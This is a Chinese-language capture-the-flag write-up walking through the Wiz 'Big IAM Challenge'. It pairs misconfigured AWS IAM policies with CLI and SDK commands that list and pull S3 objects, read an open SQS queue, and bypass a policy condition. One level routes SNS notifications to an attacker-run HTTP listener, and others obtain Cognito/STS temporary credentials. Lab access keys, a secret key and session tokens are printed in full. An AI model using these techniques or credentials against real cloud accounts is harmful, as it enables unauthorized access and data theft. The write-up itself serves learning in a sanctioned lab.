Skip to content

WIZ The Big IAM Challenge

约 1324 字大约 4 分钟

iam

2026-05-17

IAM 是 Identity and Access Management 的简称。它是云厂商提供的一种用于帮助用户安全地控制对云上资源访问的基础服务。简言之,它就是一套访问云上资源的鉴权系统,也是整个云架构的逻辑边界。

challenge 1

IAM 策略

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"
        },
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b",
            "Condition": {
                "StringLike": {
                    "s3:prefix": "files/*"
                }
            }
        }
    ]
}

很明显只需要列出来即可

aws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/
aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt /tmp/flag

image-20260517162833020

challenge 2

IAM 策略

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": [
                "sqs:SendMessage",
                "sqs:ReceiveMessage"
            ],
            "Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"
        }
    ]
}

策略允许任何人("*")执行sqs:SendMessagesqs:ReceiveMessage这两个操作,而资源是一个特定的 Amazon Simple Queue Service (SQS) 消息队列

任何人都可以向这个特定的队列发送消息和接收消息,依据题目信息 Account ID 和 Queue 构造URL 地址,URL 为:https://queue.amazonaws.com/Account ID/Queue

aws sqs receive-message --queue-url https://queue.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2

image-20260517164334849

challenge 3

IAM 策略

{
    "Version": "2008-10-17",
    "Id": "Statement1",
    "Statement": [
        {
            "Sid": "Statement1",
            "Effect": "Allow",
            "Principal": {
                "AWS": "*"
            },
            "Action": "SNS:Subscribe",
            "Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
            "Condition": {
                "StringLike": {
                    "sns:Endpoint": "*@tbic.wiz.io"
                }
            }
        }
    ]
}

这是基于资源的策略,受保护的资源是 SNS(Simple Notification Service)。

借助这项服务,开发者可以把通知推送到移动设备、电子邮件、消息队列等多种终端,从而轻松向用户传递重要信息和实时更新。通俗地讲,SNS 就像一个消息广播系统,能够快速、可靠地将消息发送给订阅者,让他们及时收到你的通知。

该策略允许任何 AWS 账号下的用户订阅指定的 SNS 主题,但要求订阅者的终端地址必须以 @tbic.wiz.io 结尾(该地址不一定是电子邮件地址)。

那么就能起一个HTTP服务(如nc监听服务),指定订阅地址为http://x.x.x.x/@tbic.wiz.io 这种格式,来绕过*@tbic.wiz.io格式限制。

aws sns subscribe --topic-arn "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications" --protocol http --notification-endpoint "http://ip:port/@tbic.wiz.io"

image-20260517164851250

再次监听然后访问链接确定订阅,然后等待推送

image-20260517165228988

challenge 4

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*"
        },
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321",
            "Condition": {
                "StringLike": {
                    "s3:prefix": "files/*"
                },
                "ForAllValues:StringLike": {
                    "aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"
                }
            }
        }
    ]
}

Admin only?

aws:PrincipalArn 限制只有特定 IAM 用户才能列出 files/ 下的对象,但使用了 ForAllValues:StringLike。对于未经验证的匿名请求,aws:PrincipalArn 键不存在,而 ForAllValues 在键缺失时默认返回 true,这就导致匿名用户实际上也能绕过限制,获得列出 files/ 前缀对象的能力。

--no-sign-request 参数会在可以用来执行无需身份验证的请求。使用该参数可以跳过对请求进行签名和身份验证的步骤,从而可以在某些情况下执行不需要验证的操作。

aws s3api list-objects --bucket thebigiamchallenge-admin-storage-abf1321 --prefix 'files/' --no-sign-request

image-20260517180038595

challenge 5

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "mobileanalytics:PutEvents",
                "cognito-sync:*"
            ],
            "Resource": "*"
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::wiz-privatefiles",
                "arn:aws:s3:::wiz-privatefiles/*"
            ]
        }
    ]
}

基于身份的策略,要用到 AWS Cognito 需要先创建一个 Amazon Cognito 身份池,然后填入创建的身份池 ID 去调用 SDK 获取临时凭证,最后通过临时凭证去操作资源。

图片地址如下

https://wiz-privatefiles.s3.amazonaws.com/cognito1.png?AWSAccessKeyId=ASIARK7LBOHXO5XNJRYL&Expires=1779016029&Signature=LNGfPxs6ZbhnB%2FSy%2BKauz6Sq0Ds%3D&x-amz-security-token=IQoJb3JpZ2luX2VjENv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIDp6rZ7dFtIjCjAJ%2FbU76oRcbF13xXD5py%2FE9WFa38xiAiBppaOTrpnwJyFaw2%2Bks%2FlHKK0caPw8yOHae5Yt8XvVfCq3BQij%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDA5MjI5Nzg1MTM3NCIM8c1qvw8EZy%2BmDXYGKosFKcZtEQnFULC%2F71on%2BDbpZrmyS5ZBc7IPIYHWY1xt7RUSenVOvce%2B0GtgRwkVgfb5v76raMk3GFouWu%2BmRKcQ%2FkFp4sFVN1SBGAA2LYAVFhW3VAupC7H873htmf9Dv%2BFMa7zikbXYHlHKlZkycKGb1w9EcXyLg4B7uvB0MIP3qHogMzkSwoDdHsZk1rukBfVoOc52f8pdv4NJxm9uSEYzmfv4mmGewMlZFey%2BDtTZGy9rkAgYzT5BvqsRkjASycbw3Dysbi6SFC3jR7nJdErdu0J4W78HeoIUXkK%2F9TrcSQyaphSPY9d1owtco2BbTRVASN5A1nSmFy3MdW8wEKc5z4DXbyDUJT3f6j3J7rovqSpiTElIsjTipqcnxobJQOxzJOa7Lo52O2Ak79Fv0MAJ37bfQBoe6jhLsIc8uBlJS0HdGfFFTTbhVpUKnp9uJV5BLSMGsjgAjR8KGKnD4JtugCRnOuFrofkYjyUMtOMhvZBQJUNj51w0st0FjV9jAOXs5Mr7XH8pVDTC42CnojV9qiQm924QYKrhEA%2F2%2FEcXS%2FFcGwtbr%2FJ%2B%2Bq%2FV0sE5PVzeQdYKCCnwFlYG7Oh5k4JEexFG6KNuUwm9zTGmo7AanMZSxdcwJoRiUYRTUMZrJIo02LXgc1mqCwIyJB9aykPKnWbabkeJFBXdzUkEz6%2BuFyKJoU5C5CYZdTOkSvTxZ6NCtWGCKooRnZfmYxdQtJtFA%2FXkv%2Bh3EJJpNML5KBEp5zoGfBuwNAjpvJlbuYfa%2BBtQayVlUvjE1A%2BQf221QD%2FUhGhjWkrLwRqY%2BoxH8PQT4WeFEsJQruae8h2j1FetYfUMxffoOpx4W6SvCdKUHRpSdnmMAAPrki69CIklMM2mptAGOt8CHzc7ciRiZ63hMeADyvipUhvY7hsjpQ9oU0nORvEbKGIdM%2BNlnEA5UEuo65BiZtciKD1hXGHn1%2B%2FFBM7lA4X4kZw%2FQ9lxrEiwqJmJBqYHKMlf5LsOcDvJepFhZEBiJ9vmRRo3AQ5h5ouLGPsIOf6ty%2BfRVr%2BIpqjbPRoiaxXctiusrcC1FO22ZCHUiB9wxji1nppdFrTzvbF3tsAubbctdh%2BMV0f3PHVjX5qusdo1qbgNMWL9n9p9RAPkgdwt%2BDuAfVEv2Ty10c%2F81UkqEan%2F3Xt8ESacdxApGm3VN%2FQcmlXfzbZoTTtPvj2WmxAisJACbjTEJmsQVudZCJDJJtnUX%2FIzeRt0Oxu%2BRQDn2qxDPwnccBd66A7DPvfyQugbsR1FrhzYAfbtgNFgZRgCcvpYAvAiMLwKH2%2BrslZ0H8u1jBhslUW7sCDU3XWixPh%2Bg0%2BboSeoeI3DZ1lPCi6nXlG%2F

题目在前端请求暴露了这个信息,把这些拿出来放到 console 去调用

image-20260517181124856

AWS.config.region = 'us-east-1';
AWS.config.credentials = new AWS.CognitoIdentityCredentials({IdentityPoolId: "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"});
AWS.config.update({region: 'us-east-1'});
var s3 = new AWS.S3();
params = {
  Bucket: 'wiz-privatefiles',
  Expires: 60 * 60
};
s3.getSignedUrl('listObjects', params, function (err, url) {console.log(url);})

image-20260517181324602

换成 get 再发一次

AWS.config.region = 'us-east-1';
AWS.config.credentials = new AWS.CognitoIdentityCredentials({IdentityPoolId: "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"});
AWS.config.update({region: 'us-east-1'});
var s3 = new AWS.S3();
params = {
  Bucket: 'wiz-privatefiles',
  Expires: 60 * 60,
  Key: 'flag1.txt'
};
s3.getSignedUrl('getObject', params, function (err, url) {console.log(url);})

challenge 6

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Federated": "cognito-identity.amazonaws.com"
            },
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {
                "StringEquals": {
                    "cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
                }
            }
        }
    ]
}

这个在之前做题也比较常见,一个临时凭据的 STS ,使用 AWS CLI 获取身份ID和web-identity-token

先拿到 id ,再获取 web-identity-token

aws cognito-identity get-id --identity-pool-id --identity-id us-east-***
aws cognito-identity get-open-id-token --identity-id us-east-***

image-20260517201036478

注意一下这里的 token 去除掉换行符

aws sts assume-role-with-web-identity \
  --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role \
  --role-session-name aniale \
  --web-identity-token eyJraWQiOiJ1cy

image-20260517190553456

根据临时的 aksk 再去配置,这不知道为什么 export 不进去

AWS_ACCESS_KEY_ID="ASIARK7LBOHXDY26UMDL" AWS_SECRET_ACCESS_KEY="3NBHjvSfuCQ87bx97yoyWcQlo0uDdpefSMJYBwUt" AWS_SESSION_TOKEN="FwoGZXIvYXdz
EO7//////////wEaDAetIKanRGXX/ehjQiKmAtDRXrsTcnm1+/cHC+pwxL0Z5eB2Thm3/jgIbzDKcLitsv0fBu3x5tMDZXPNs/htJ7jMh/IREaGM/FuAYiTYDjAeS2gwcC+owaQ1Ju/
+i4tFTQXafMuobiYZVq/DCuKBf/QpW96i3T4F/C11KFpQApiVq7kTdAmUg0tK+WJ7It1/D0fS25CluRueWazuZUPaW5pCbUJJN909NyIAx0Trlh6NSOtO88wrJeUyV9u4LhGzQ7dm5e
O4M+8WdidbqIzX0c2jbZqfRZ+Wbb1vwjWrSbjk5yP+3NFKdaQxmQpLergiSNEaG5ngjk7vKVD0Im+xLevl8vAVuhXWhd+U24U2j6bgUJ0e5FI+MkArc/IuZtmvvEFzo+54S0M0RUOyt
30GpeeW0gYwWCjj36bQBjKUAVd6pVMYRwxg4Ce7rElzj9JTBKuNE6I6PLNrXwrgLhvgmEjpggIc8CswJoyHWjB9mkWFOR0a/OVJxgdXuVpGmVjvzVn4VZ2AszIG3h1g3Pok1W7ufWDY
z7b1ngApEkCDyqNBOtcYAm+TBEUJQmUQeMAuN/nmY45UDAMfeur8UwZEodVqCowW726XSAhcqCfmy0cGHpc=" aws s3 ls

image-20260517201744289